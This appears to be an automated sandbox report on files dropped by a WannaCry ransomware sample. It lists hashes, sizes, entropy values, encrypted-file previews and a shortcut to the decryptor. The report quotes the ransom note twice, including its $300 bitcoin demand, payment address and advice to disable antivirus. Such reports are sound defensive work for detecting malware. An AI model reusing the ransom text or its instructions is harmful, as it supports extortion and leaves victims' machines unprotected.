                                                  SHA-256:3AE8EE268C19D3ED9049D67140BEFACB48A0B24B54722AE8C1BCF567F8FFAFC8
                                                  SHA-512:FD23F434C9DD645806CD4E09FD015E17291E3C613486A32AC973B222E3A55390B7CAA3769F1D71F97EA28218020CFA6F29D3BA4F26917967C3237AE44F5EEFCD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7926358695836955
                                                  Encrypted:false
                                                  SSDEEP:24:N7vTmupoOQiqmXeTnumMAm7Ey4/EBB5zYsvfx:N7vCuGOQUOTnuvDE7aLd3x
                                                  MD5:05BBDC74048BAF5700EAC9F0F502B2E2
                                                  SHA1:8D9F939696CE848D964B7262654EFE8A4354AF1D
                                                  SHA-256:F4A3B1744C479D99238E2FF65C738BF2A21C08F3F60EF232584769023AD566EF
                                                  SHA-512:BA8C791B57D1E1145D6264B1C05E9302341D143C8BA5A65D198CA4D9FB3C0517869F9268A31CC67A21B3C40740CB3BA26AA1987F3224F34C25A00E87AB4C53AD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826806008416017
                                                  Encrypted:false
                                                  SSDEEP:24:bkFzTKynCCvRoRSn1/LJDTD3cVOu19UrKoahB2mYt59BGpBcx7d7Xh/1Pl8I:bkFzeynCCGR4J73Ju3U+PC/ySJXh/1OI
                                                  MD5:BE4918347EF43FD8FF639AF59B9B2FD9
                                                  SHA1:CBB7C1DF73A2B696E47832178D00FF6ADF73A9F2
                                                  SHA-256:3508FDC65A3A8DE02E63B0F62D404D7ABAF897413EAE1003AC265BEDE018C6BC
                                                  SHA-512:517213A7D92DD8D165EF457F67E78B3AE468BDA02793C88B6B4EEE47D9EE76583A82CD0453E1F2FE061023FC44411E06F6A6586159ABEACCDC5E989B0A335C3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814963475003599
                                                  Encrypted:false
                                                  SSDEEP:24:VAwE2o5O3DTvy0NBdNtbyFTvd6r48d3fcq4/id0xywp:m5OTTv9HtbyFo48Bf3d0gwp
                                                  MD5:FAD97FEE497B18A3CB162EE30412AEF9
                                                  SHA1:10061238E99FF77599BB41DCF5AB1E84A961FD17
                                                  SHA-256:02FA6DFAA627BEB9A7742FDDCD78785168E83C5A063615F2EA6422ACA4B2C7CB
                                                  SHA-512:62CFD2E7F33A674957C372A410590A7049272091BFEF7A0A5D69A409CE29816D0BF6D670F362C4B1B0708EECE9B0BD2B5A55D944A0A8C91A3E5C309C7C39D26B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.82874237881211
                                                  Encrypted:false
                                                  SSDEEP:24:bkxEJZywLgrjRKeYROPcgCvHEqm39Zd6Xypmy3bRPJkvwxGNTPyDNmtc+phIPNU:bkxEJZywLsKRwPcgCvHEqm3nd6CmuPJU
                                                  MD5:0B96BC35D02087D2497748016AFFB178
                                                  SHA1:93ABAB2CC1FF2317BDFF969231733A4CAFF77453
                                                  SHA-256:35D6890000896DEE6A373E6A523CB523A3C17D3CEBC26201FE8007C0DB218EA3
                                                  SHA-512:CCA4BF0EC64C31E0BAEC003DCCA7133E5535F33B428FDF35CAA4411A2704C18E7ECABC7F6FD953AC3A6A74D416E51AFDADDE60A769F003289AF2DCEE28CE1B1C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803180803604506
                                                  Encrypted:false
                                                  SSDEEP:24:h3XW4p5cI0k/PVFadDlyAcn5XctBAQZkKawlC:hHpp5c98PDIYfkBAQZkKawlC
                                                  MD5:DA322898E885F1E8C925EBAECB6045FA
                                                  SHA1:58BA19237E250CC0C338C7B54376C59A323D8CE9
                                                  SHA-256:9DD7C76EBD45BD9968855D56F4E0368C1EBB6C8554BE56AB9B41BA9DE5BAB3B9
                                                  SHA-512:BCA6C334B42D2D27C699646C0F815BDB70DA0741043C44E475E47130603BBDF167DD879D6933A2172829ACAEE51BAB96F3AD1BEC1B1BD754BE75C174EBF87864
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8429758708201165
                                                  Encrypted:false
                                                  SSDEEP:24:bkO3c3teyzOzHJR4Ka64j0gY31qrMdG/rU6ernI/PsPNXJiip0CO9c:bkOs3tesOzHJR7+j1oqrMdG/rIrI/PsB
                                                  MD5:E074E71D514FECFA16C12F4BB61544BA
                                                  SHA1:F3BE4310D0336455434BF9BC2A7B2C1137850936
                                                  SHA-256:F8EDA44D757DF38DCBF85908CDEDB5DCFCBB5B6402351A343752C68C57AF9993
                                                  SHA-512:6D9286C84F852864FB9C09CAE3CF8B276C57209841C02E935CB25C2076230CAE10502FE3C03037EB7A0EB417616203596DB16B3008E2E60CC5B455DC499302D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826449049195866
                                                  Encrypted:false
                                                  SSDEEP:24:gVU1czT74CGq1AsY9soc6VhdN+9v/Ob5osBFhgSsCtY0+rrHLN:wUi+J3sP6VRCv/ONPRY0+rHN
                                                  MD5:5EAE5DD5F9B748505540325FDDEB0E9A
                                                  SHA1:A23C2D51C11705DA4964A8F0EDCD4A1E3A9216BD
                                                  SHA-256:034F87826F2B31CAAFF147717562C70AE2864A5743BBA209B4C77A06F8CDCA74
                                                  SHA-512:80BB34F1D5DA45ED32869FA03C385AFBEADB70D43C89E97684B3F22E9BEEFCDD8257056A1A00C6D03F73DB97D85B5399A6D940D125523F36B17D5A86F9874439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843721583861324
                                                  Encrypted:false
                                                  SSDEEP:24:bko5lBAoqy/YEnHyneYImH6l8V6722Kfrz3HSpxI5YdsFw92I2YULqfet6MmLWpt:bkoSo/YoynFsuE7WrzYIiKFw92IWLYcL
                                                  MD5:B6942840DD3DF9144225ADC44C954294
                                                  SHA1:98FC1B9DD9FFF28B8DF0B5E65582526F966098DD
                                                  SHA-256:E403B56A1BB3EA2605FB8F53AA07D94E5945A712B57B0B3FD95806A4DB57461E
                                                  SHA-512:33C167B2F84D28F23A1C8B9559426107E23B5633C91128981B523B6F381A96269B87CE84206D24D1D6A177B8CBD42C63EF47B5231ACB3C7FBB8C4FACC773A50E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....20.<.iN../._...o.h.h.T...[....^3W..........$....FE.U.Dm.a,0.L..]...,.c..h.......H....;...yU*..6....E......b.^W+.HL..V.....z..d...O..0"....5.yhV.nD....7...s...>._. ....X..+.m.E..bu@.Pw...u. .s.I)..7...Y.Y;BZy....I.ug.n..\!H#I<.r...7K..9 e..}..N..............K...L+F.I..j.....7.a.5."n..G.UN.-...zG....?...L.....8FG3....4..[...K....&gU'M...}{.B..gsx..,?..UX..dF....RF..'4..id#.Zz......W........9........V].:tD4.%....3....o..N..l4.E!..BX. "}.P....>GI..8.m.UZ4....5....Qf....hl@.....b..6.M..`....Y.H........>....M.V'^o...!.........tF?c"1..."!xl.)......D*8.{h3.40L%.tH..7..5S..I;...K..{....We..9..?y.O.I..f.Ck2..s.......=K..c.F{ ""5{ .0..]..u...YY....].bh.....<4M*..9p*./..-.B..$w1.!.B.....6Qq.W..$w..].'%P.T...."4...._....Iy7......+..F.5:=.}.......B....V"P......{._c#.g....\.ZW.=.zT...S.VS...H...`.....d..2?,"M..k...n.s.4;...........Z_...R*#.....@.H....R}i....GM......P#..L.......H..[."...F.[.dt.{.1.Vb..G\-.....^f.P#.+...$.=....t._![.
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79232013754835
                                                  Encrypted:false
                                                  SSDEEP:24:oZxl81JpnmwfXXJMj7LhP84SSdtI94Drob3wMV94wvowVOdg9VJ5Q:+xomwRMTpnVqwRMVxpJi
                                                  MD5:8E835949F0D8BE5FE6AC747F00599727
                                                  SHA1:0A011CF3D8E0ECBEA4AEED70E1D7BA3A1A5E9929
                                                  SHA-256:57E6E4D594C412378F534977FFF1DCC758A90A97A8F7D7CBED5A44F7615092B8
                                                  SHA-512:27E2DCB2F5A37190364239CB176F5A6B3A8A29949C5E93629E5DADE513A1836070B26434231B5BCEF67D3602C2E4BCEB0D76DECDB0357C8BF0E7113450D3FBA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8313791005395545
                                                  Encrypted:false
                                                  SSDEEP:24:bkC/IBWlK2phdkC21d/u9BMjrNj4MwSObF+iyuk/FYbPD1rgRbUPuID:bkRBCpkC2L/u9BaJpPK4ic/FODhgjID
                                                  MD5:3F28B30CABA03111DEAA61E3A6144E29
                                                  SHA1:5A63D1D1B5746B1AC5AB20C2B1BC0E9967079878
                                                  SHA-256:AF8EBD372CC6B218EB09CB5F4A60DC756E2A39836865328304B08F16541A99DE
                                                  SHA-512:EA4DE4E0431B476EE7666C7B6CB7F1E2E42E309B5C1238281EBF6F92D8944E4F358882FC09FB88E1427ED04E177BD011A343E51C2DE669BA38316B945E14529B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805824408024066
                                                  Encrypted:false
                                                  SSDEEP:24:PNr9HCIwSSHZt7/hNuvjSw+lqhFkKEclLCZi5+czLoE/8pXH6:fHC3SaZt7/hNuOLlaFkKEclaEvME/R
                                                  MD5:FEF28180F5DEFA1FE68487728B4949BE
                                                  SHA1:9B3F86BB55B017EEA1F784E10CD283D26CBBD7D9
                                                  SHA-256:6FEA34C9131DA3FF13A8ED6B813826AC8D89A5EFE391410FCD52A92A9654F466
                                                  SHA-512:45E2DBB228A894BBF4BBD31B6306DF91B7EA94F4002EFBD00580F323EB8A30FB5CE1C36B95C888D5788765C36AC096A4E4EDB0FAA782BE1A9778FF467E0E0F7D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851571144638738
                                                  Encrypted:false
                                                  SSDEEP:24:bkdy+LoKdlPkqY0g3Kpk3vuVNUiBw1lOKGw0KG4yUnzA9Hnl5cIFBBYhRTyB:bkdvprY0gjkUDIK44yUnzA9F5cIYmB
                                                  MD5:49551252F4CD68FBCCF7624883460557
                                                  SHA1:1CD2DD9CB29F6D0BC8A12188B5CF6515FF78C54F
                                                  SHA-256:16F12B0915521E1A5797C47CD8FBF7EB5FA284E22F5FC3FDE047BAAA2441DE91
                                                  SHA-512:6320CE8994ABBD2E3860F2F0376184B2F8386C9AEE649FDA8CC32ED1592B6A678A56A1FA402938443C4BCB1EFB645E0B4E5784D2011168851FA359F98C40D337
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.781847511154211
                                                  Encrypted:false
                                                  SSDEEP:24:qtAFNSxi+jA+nx4aNTEANuEjIuQ8nkyhwKknT:YAFN8i4WaNpjBnO
                                                  MD5:3D86B521F5076A842802D1003427F0F8
                                                  SHA1:939BC8066C3DB59564B211A6DAA455C4F1725933
                                                  SHA-256:20B6BB7C51A62C21E4F2F8912C50AF9ADC5A52B4DF89C4F04C7B9AC4ED643941
                                                  SHA-512:B7D82C6A2F62DAB099E4D4F578A4E0E95A35C1EE265D72197E8634B13F9677E5BD4D48BEB7D0E308A797C078A284DCE3F86FBE8E376EDB3A83093CACA142CC88
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8359916517030275
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPY6kX/Taa9dZRGGOdsfJORXkYO0VSwGiskyuVsdh7TZAKVldrYFNP/QrY5794:bkhPXkX+aBRGGnUlk0O+JVsJVldkXPIB
                                                  MD5:2FBCC999106D0C5054B345DCABDE7BCA
                                                  SHA1:FFA34695C1A98D557A09CE91BB81128F70826D12
                                                  SHA-256:774263CE538977EDC2D7F06821103BD0DB92A218E35F33136282BCC147DD2424
                                                  SHA-512:578094635365189F3E474BB18B98A70B2D1BD664BB4829D0EFA5F8F44B9A254A38337F28B33BEC89D48781FEDE0298771375F1388F8D3222EEB7E086B1C25417
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803341746289428
                                                  Encrypted:false
                                                  SSDEEP:24:yHkLJymbRt/LbFeuaUe5iGaeOT0VdkKVH1Z6:vLlhpeJLZ6
                                                  MD5:808744CED06394BCD0591F65D1DB7F80
                                                  SHA1:C60BD50AD196517BBA21745F1C829AFC201CE1DF
                                                  SHA-256:11B425FA61C9E77F0AA3F6467BB17C7D9563DE2DE7D2C42123D4983C252EF24C
                                                  SHA-512:AA0BF9A7C75583DF2BCE3C6A59DB0B5EF1ABACD1F4B0ACB4A31712D96C1177BE653E730C480FCBE577D06C3DCF58149A3AEDD950CD7A0253B5CCB7C442F9E29C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853958260002917
                                                  Encrypted:false
                                                  SSDEEP:24:bkDr6h19hezKn/mVd+Caonhj6ylOjZ/hpsUxXIPeOD5qxednZkSMszcAoZ6WM:bkvZKeVdpoylOV/jRUx5KedlMsz6Z6L
                                                  MD5:366E91DC658690E5864E061EFAD0A4DA
                                                  SHA1:F829B8FB11810993E4D74A0F83B4196A79DC87B1
                                                  SHA-256:DF1F56B9BD43DCAF10FA253AA5846F2DC36A47D962289869A5AC4083D6FBB4E9
                                                  SHA-512:A03F4C189EAF7911B2A8857089961FEBB082723344BB644B68DA555ABB543AF28E70940B7F93459BAFA032C4C2515BFE29989DC4E621F629A12BF18A657EADBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.832587535588094
                                                  Encrypted:false
                                                  SSDEEP:24:bkyA9elMQH1XycgxeojdSPbSqdDgYy3fbzreUz6FYZGgnmo2xZ/M:bkyqelMaXOeojdObSqdS3HrNnmo27/M
                                                  MD5:363804D72CB5F2014F7192BEED380EDC
                                                  SHA1:EE1F5973992465D747708034DE80BA50C4F2E9B9
                                                  SHA-256:A647A14D32BF90D864AEF40BEA03251B16BC0BD0440FDB7DCD51892CE0728B29
                                                  SHA-512:BBE49C32D7EBEB2E65E2DB75CD09422FCE72EF7DB8D18707425903F5B3D23C93C770DECA6A4A7A370FD5E5242F93C3B33F94A85307FA2AF4E2C7CD262040954F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856430237778002
                                                  Encrypted:false
                                                  SSDEEP:24:bkiAAB+k2Ubc0pxPfsishYAFPCpMMZwb2KtjB9TEDUjubz49cZDL0DjjM:bkiAyp2UbhpxXsiqxCphk2QTEIJcJ5
                                                  MD5:4F336418442A64242CF5B8132DBA0CE4
                                                  SHA1:598EB1DF085451B0048E9568D0DDE2AC9D5640D5
                                                  SHA-256:C7B6E058B3F904D7163226603ABD6EA9061F2E1296FE405F8E10798B81CD6AC7
                                                  SHA-512:E0061EBF4A9A902F900FB18AC4234A1CC7AEE6F841ECF869E83DE5A6F5B025B404C33CB1F3B8D0F5A173455BF397DDCAF2E2790CB16D28AE0416DB7A89FF8E8A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855157527838755
                                                  Encrypted:false
                                                  SSDEEP:24:bkPGRDyshqYk49vQRAemDzYwRf+sUKVfOE4XbrThgu23/IOVK0pJs3Q3:bkduqDKvQGrVU+F6dgBK0pJsg3
                                                  MD5:E646AC47CE9C0B58356BD0171411C72E
                                                  SHA1:18EF8551CBB1879274F079F30EFFBB8400781F1A
                                                  SHA-256:90F144BE973A86100D0DCE9FF16B6ED4B26D73181DBEE06C97EF091F3095DC3B
                                                  SHA-512:90981C9496DCBA000A1F461BCF29EA741265147B6B37612C77B48F18396B59A1677C62A152B40441C370BD3639DDD581235BB593007B73B451349811417E45AC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.811984123982203
                                                  Encrypted:false
                                                  SSDEEP:24:bkgb8G4xpn9zA200t9gkw4ldRuCBF9YMjJB30ALrbUMldkZUH:bkgb8GcndD0UKSBFK+JZBhgZUH
                                                  MD5:0516F42417A3F04C707ADAC115D2CF00
                                                  SHA1:A2648753C15BDDD23118709F0A98E77709289901
                                                  SHA-256:22106308BA259C60ED8B1740E7C37EA52105D84EF624C32AADD1E6FF91DE4FD1
                                                  SHA-512:A501E083458624AAF15DF7CC4F77EFDD63AF45FA4A4B16CCC2810092F73339327A6A36D5B4EC50510130D787A90D3BA7A1515B2022628E87FF0883826DDF0E72
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.807958225155772
                                                  Encrypted:false
                                                  SSDEEP:24:bkP8tAzxbR0GDwisZvcYFCqTlX3uLTsMHPce6AZfqq2L1dHFaQToGEa8sTGcBObx:bkPWWbRHEl5X3P9iiL1d7ToGYm1mFrYm
                                                  MD5:5990554E5D93E2EFF0010F63A6C14086
                                                  SHA1:29E15061889B84D3DEB0F0D9BD833A4D8C321EAD
                                                  SHA-256:05B9FFFACD13D204A3AF9CCCECA1E3EFCA7CA5714208177880ABFAE7A45E0D37
                                                  SHA-512:6D202CED87AE35540CE3201BC56B637C8914DFA866FB57143A656D716261871AF5A85E977C2EF45D5A298D74F9431C1AD36E4C144A82965DF0FDAF5AC123F40D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838863709126363
                                                  Encrypted:false
                                                  SSDEEP:24:bkVTf9A43k6VFre5gwGAKTuiykkvwXJ3RH95nyI6d8WuZ01ScumJRWXM1+QONvk:bkVTfbVVofKiaWwXT9udtl1EmnIM0fs
                                                  MD5:C2F6D5CF81F0ABE8F428E756F86F8C88
                                                  SHA1:0AC22974AD496109A795DF1E873BCD2B103581CC
                                                  SHA-256:7BFC58D74823893F67449E94F08E51F9FFF3883C0F1630466E4A2456E7726A92
                                                  SHA-512:981F7F35715B2F603FA36F121AF6275D8A78B6F31AF7BCD830E54DC6C583881EDFBDD5E48E65E295C9440A0E4B081E37481A32C21F1E695C2B81BBD2C29DD924
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849975900566908
                                                  Encrypted:false
                                                  SSDEEP:24:bk3HRjpNVkFVQAGBG+eBnY6TPkHo0Kxr36Pkhk8F2T6sMNq1fD+6OajcPWlrG:bk3HpUG3eB9PkIVK8F2skfD+6Oajc+pG
                                                  MD5:6FF350E132C197D96B4366EC38BB6D36
                                                  SHA1:804880245B4A194BFBC341629EB08CAC4260CCAF
                                                  SHA-256:8F8CE9A8B0C444D7CA452F6E5C235AADDA9AB988FB949220FD131B2056EFBF6E
                                                  SHA-512:560E8596410B39697B57145CFFF3D8184E995A9A64F8C9B4ED1F17B673BF52266630BEF74858907E5F803C103983F7A48A4C87B3D4ED48B9DE37516F1EDF3A50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838458580321408
                                                  Encrypted:false
                                                  SSDEEP:24:bk0ck+SsncnFglCxJka7pCmXsrYgtw3sg74KguW8bj5O8v:bkyucn2wJdsmXrga3sFsj5O8v
                                                  MD5:DEB1219D3C1D2DFABD5817915A984F46
                                                  SHA1:CEDD5C6B9D5585587B63BEAFD675731A306BF5D6
                                                  SHA-256:51E1E02AB589C5A775FC943E77C0B6B9E4DCBEC8C3AC85C6CCED2C98B4F01C2D
                                                  SHA-512:45C9DD368B5DA7368EB5876BBCF4D8902F95C3492B3E646A551A9C4984E29C6D64B3477027944DE0DA1B3059D7CB43D963F279012971CA539A24C56A6F623356
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834222334168714
                                                  Encrypted:false
                                                  SSDEEP:24:bkSnTOXUBJyVzx77mPm3P/DdHwBjNirXoABykIYApQSDjUdrfKQBWnRw1O8:bkS8YJAx77f3P/DdK5iLTB3IYAGSDjUb
                                                  MD5:C9154BF36E9E7894034124BBF7112FF1
                                                  SHA1:4C91FDD1BE911E31974BDB22B37899EBB2D84A6A
                                                  SHA-256:74759CC05AFB8285B3022CAA7C46A9B492EC5DCA8FC4127F3724400140A0BCED
                                                  SHA-512:BB4630FB5412874BF01FC50E4EB1759375A83F34A4816B68036AC744F0444302F0D58E5426D3EFA74EAF6CF3B34E6ED9FD1BCEF067D3235530E278BC57845D89
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.819127742949708
                                                  Encrypted:false
                                                  SSDEEP:24:bky2n8WjqCZniu4AGVE/7TP4dY6lD/XEWlq70zMNBkw8NCpPkfjPmDd7o:bky28WjZ67m7TwdlzUWlq70zMnkGcDmS
                                                  MD5:46E03594CB0BD00CA5A5E378933636F2
                                                  SHA1:B495084A9E753470D8857AC662184EE30A1D6AD5
                                                  SHA-256:2398908ADF3E9CCFAEECE05EE818C90C76C0E30455E3D74FEE8CD8C97DAF64EB
